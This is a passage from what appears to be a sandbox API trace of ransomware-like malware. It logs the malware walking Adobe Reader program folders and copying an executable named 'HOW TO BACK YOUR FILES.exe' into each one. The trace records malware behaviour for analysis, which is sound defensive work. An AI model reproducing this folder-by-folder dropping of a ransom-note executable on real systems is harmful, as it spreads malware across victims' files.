10.0\\Reader\\Tracker\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.736] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.736] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x801fc020, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5483cc20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5483cc20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0058.736] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.736] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.738] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins" [0058.738] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1888 | out: hHeap=0x2b0000) returned 1 [0058.738] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0058.738] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins") returned 57 [0058.738] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins" [0058.738] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.738] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\spplugins\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.744] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.744] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ffc0b80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5483cc20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5483cc20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0058.744] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.744] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.744] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services" [0058.744] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1808 | out: hHeap=0x2b0000) returned 1 [0058.744] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0058.744] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services") returned 56 [0058.744] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services" [0058.744] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.745] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.750] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.750] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x820095e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54862d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54862d80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0058.750] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.750] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.750] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d" [0058.750] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1788 | out: hHeap=0x2b0000) returned 1 [0058.751] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0058.751] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d") returned 58 [0058.751] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d" [0058.751] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.751] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.757] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.757] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7dbbfec0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54862d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54862d80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0058.757] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.757] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.758] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prc", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prc") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prc" [0058.758] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.758] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0058.758] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prc") returned 62 [0058.758] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prc" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prc") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prc" [0058.758] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.758] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prc\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\prc\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.763] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.763] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prc\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7dbbfec0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54862d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54862d80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0058.763] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.763] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.763] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins" [0058.763] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1708 | out: hHeap=0x2b0000) returned 1 [0058.763] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0058.763] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins") returned 56 [0058.763] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins" [0058.764] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.764] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.769] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.769] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54888ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54888ee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0058.769] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.769] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.770] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia" [0058.770] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9e20 | out: hHeap=0x2b0000) returned 1 [0058.770] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0058.770] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia") returned 67 [0058.770] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia" [0058.770] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.770] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.777] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.777] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54888ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54888ee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0058.777] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.777] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.777] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR" [0058.777] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335568 | out: hHeap=0x2b0000) returned 1 [0058.778] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2500 | out: hHeap=0x2b0000) returned 1 [0058.778] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR") returned 75 [0058.778] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR" [0058.778] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.778] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_ukr\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.784] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.784] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7e1b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x548af040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x548af040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0058.785] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.785] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.785] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR" [0058.785] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3354c8 | out: hHeap=0x2b0000) returned 1 [0058.785] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24e0 | out: hHeap=0x2b0000) returned 1 [0058.785] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR") returned 75 [0058.785] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR" [0058.785] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.785] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_tur\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.792] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.792] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7e1b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x548af040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x548af040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0058.792] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.792] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.792] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV" [0058.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335428 | out: hHeap=0x2b0000) returned 1 [0058.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24c0 | out: hHeap=0x2b0000) returned 1 [0058.792] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV") returned 75 [0058.792] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV" [0058.792] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.792] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_slv\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.799] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.799] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7e1b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x548d51a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x548d51a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0058.799] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.799] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.799] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY" [0058.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335388 | out: hHeap=0x2b0000) returned 1 [0058.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2480 | out: hHeap=0x2b0000) returned 1 [0058.799] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY") returned 75 [0058.799] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY" [0058.799] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.799] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_sky\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.806] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.806] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d807c60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x548d51a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x548d51a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0058.807] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.807] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.807] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS" [0058.807] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3352e8 | out: hHeap=0x2b0000) returned 1 [0058.807] HeapFree (in: 